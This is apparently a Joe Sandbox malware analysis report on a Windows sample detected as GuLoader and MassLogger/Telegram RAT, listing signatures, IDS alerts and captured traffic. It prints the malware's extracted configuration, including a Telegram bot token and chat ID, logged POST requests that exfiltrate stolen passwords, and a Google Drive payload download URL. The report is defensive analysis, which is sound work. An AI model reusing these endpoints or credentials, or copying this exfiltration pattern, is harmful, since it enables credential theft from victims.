Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ppISxhDcpF.exe

Overview

General Information

Sample name:ppISxhDcpF.exe
renamed because original name is a hash value
Original sample name:8dbe0f8d14496475bd0c298df8763deab33ec4a0a55880fb0b823586f65bc10a.exe
Analysis ID:1587988
MD5:e64faf30918d71691dfde574dd5a6fcb
SHA1:1d2f1edd94620404e15df9369049c3ef1b6c2761
SHA256:8dbe0f8d14496475bd0c298df8763deab33ec4a0a55880fb0b823586f65bc10a
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ppISxhDcpF.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\ppISxhDcpF.exe" MD5: E64FAF30918D71691DFDE574DD5A6FCB)
    • ppISxhDcpF.exe (PID: 4932 cmdline: "C:\Users\user\Desktop\ppISxhDcpF.exe" MD5: E64FAF30918D71691DFDE574DD5A6FCB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1991339210.00000000035CA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000005.00000002.2709490272.000000000225A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:10:25.952826+010020577441Malware Command and Control Activity Detected192.168.2.849775149.154.167.220443TCP
            2025-01-10T20:10:27.872981+010020577441Malware Command and Control Activity Detected192.168.2.849789149.154.167.220443TCP
            2025-01-10T20:10:29.585453+010020577441Malware Command and Control Activity Detected192.168.2.849801149.154.167.220443TCP
            2025-01-10T20:10:31.367472+010020577441Malware Command and Control Activity Detected192.168.2.849815149.154.167.220443TCP
            2025-01-10T20:10:33.195949+010020577441Malware Command and Control Activity Detected192.168.2.849830149.154.167.220443TCP
            2025-01-10T20:10:35.280818+010020577441Malware Command and Control Activity Detected192.168.2.849842149.154.167.220443TCP
            2025-01-10T20:10:38.087273+010020577441Malware Command and Control Activity Detected192.168.2.849863149.154.167.220443TCP
            2025-01-10T20:10:39.918825+010020577441Malware Command and Control Activity Detected192.168.2.849873149.154.167.220443TCP
            2025-01-10T20:10:42.687233+010020577441Malware Command and Control Activity Detected192.168.2.849893149.154.167.220443TCP
            2025-01-10T20:10:44.442650+010020577441Malware Command and Control Activity Detected192.168.2.849906149.154.167.220443TCP
            2025-01-10T20:10:52.335658+010020577441Malware Command and Control Activity Detected192.168.2.849956149.154.167.220443TCP
            2025-01-10T20:10:55.403341+010020577441Malware Command and Control Activity Detected192.168.2.849978149.154.167.220443TCP
            2025-01-10T20:10:58.416665+010020577441Malware Command and Control Activity Detected192.168.2.850000149.154.167.220443TCP
            2025-01-10T20:11:00.510043+010020577441Malware Command and Control Activity Detected192.168.2.850006149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:10:16.856578+010028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
            2025-01-10T20:10:24.778471+010028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
            2025-01-10T20:10:27.028453+010028032742Potentially Bad Traffic192.168.2.849784132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:10:03.127284+010028032702Potentially Bad Traffic192.168.2.849710172.217.23.110443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:10:25.435623+010018100081Potentially Bad Traffic192.168.2.849775149.154.167.220443TCP
            2025-01-10T20:10:27.603149+010018100081Potentially Bad Traffic192.168.2.849789149.154.167.220443TCP
            2025-01-10T20:10:29.349109+010018100081Potentially Bad Traffic192.168.2.849801149.154.167.220443TCP
            2025-01-10T20:10:31.086496+010018100081Potentially Bad Traffic192.168.2.849815149.154.167.220443TCP
            2025-01-10T20:10:32.825927+010018100081Potentially Bad Traffic192.168.2.849830149.154.167.220443TCP
            2025-01-10T20:10:34.821711+010018100081Potentially Bad Traffic192.168.2.849842149.154.167.220443TCP
            2025-01-10T20:10:37.780527+010018100081Potentially Bad Traffic192.168.2.849863149.154.167.220443TCP
            2025-01-10T20:10:39.593758+010018100081Potentially Bad Traffic192.168.2.849873149.154.167.220443TCP
            2025-01-10T20:10:42.401129+010018100081Potentially Bad Traffic192.168.2.849893149.154.167.220443TCP
            2025-01-10T20:10:44.222787+010018100081Potentially Bad Traffic192.168.2.849906149.154.167.220443TCP
            2025-01-10T20:10:51.846532+010018100081Potentially Bad Traffic192.168.2.849956149.154.167.220443TCP
            2025-01-10T20:10:54.932118+010018100081Potentially Bad Traffic192.168.2.849978149.154.167.220443TCP
            2025-01-10T20:10:58.032597+010018100081Potentially Bad Traffic192.168.2.850000149.154.167.220443TCP
            2025-01-10T20:11:00.155427+010018100081Potentially Bad Traffic192.168.2.850006149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: ppISxhDcpF.exe.4932.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: ppISxhDcpF.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801D1EC CryptUnprotectData,5_2_3801D1EC
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801D9D9 CryptUnprotectData,5_2_3801D9D9
            Source: ppISxhDcpF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49747 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49775 version: TLS 1.2
            Source: ppISxhDcpF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_00405846
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_00406398 FindFirstFileW,FindClose,5_2_00406398
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 38010671h5_2_380103AF
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 38011042h5_2_38010C28
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801C985h5_2_3801C638
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801F2F8h5_2_3801F05A
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801B339h5_2_3801B07F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801BBE9h5_2_3801B930
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801C499h5_2_3801C1F2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801DD40h5_2_3801DA89
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801E5F0h5_2_3801E339
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801EEA0h5_2_3801EBF2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 38011042h5_2_38010C1B
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801B791h5_2_3801B4F2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801C041h5_2_3801BDA2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801E198h5_2_3801DEE1
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 38011042h5_2_38010F6F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 3801EA48h5_2_3801E790
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then push 00000000h5_2_384BBDF0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B882Dh5_2_384B8650
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B91B7h5_2_384B8650
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B1B00h5_2_384B1858
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B7318h5_2_384B7070
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B4ACAh5_2_384B4820
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B23B0h5_2_384B2108
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then push 00000000h5_2_384BC92F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_384B8193
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B2C60h5_2_384B29B8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B3510h5_2_384B3268
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B54B0h5_2_384B5208
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B5D60h5_2_384B5AB8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_384B7B4F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B6610h5_2_384B6368
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_384B8373
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B3DC0h5_2_384B3B18
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B4670h5_2_384B43C8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_384BCBE7
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B16A8h5_2_384B1400
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B6EC0h5_2_384B6C18
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B7770h5_2_384B74C8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B1F58h5_2_384B1CB0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B2808h5_2_384B2560
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B5058h5_2_384B4DB0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B5908h5_2_384B5660
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B30B8h5_2_384B2E10
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B3968h5_2_384B36C0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B4218h5_2_384B3F70
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B61B8h5_2_384B5F10
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B6A68h5_2_384B67C0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then jmp 384B1250h5_2_384B0FA8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 4x nop then push 00000000h5_2_389EE790

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49815 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49815 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49789 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49789 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49801 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49801 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49863 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49842 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49863 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49842 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49775 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49775 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49906 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49906 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49873 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49873 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49893 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49830 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49893 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49830 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49956 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49956 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318086900029Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319c6abdf465Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b1443a20faHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c60e986e76Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dac9051ac1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f23425ef07Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32148015fb2fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322bba2a7429Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324c62a360f6Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325f5cb5c2edHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b9716ee95aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32debd1abcefHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ffdcc81d2fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd331a3d88592dHost: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49784 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49710 -> 172.217.23.110:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
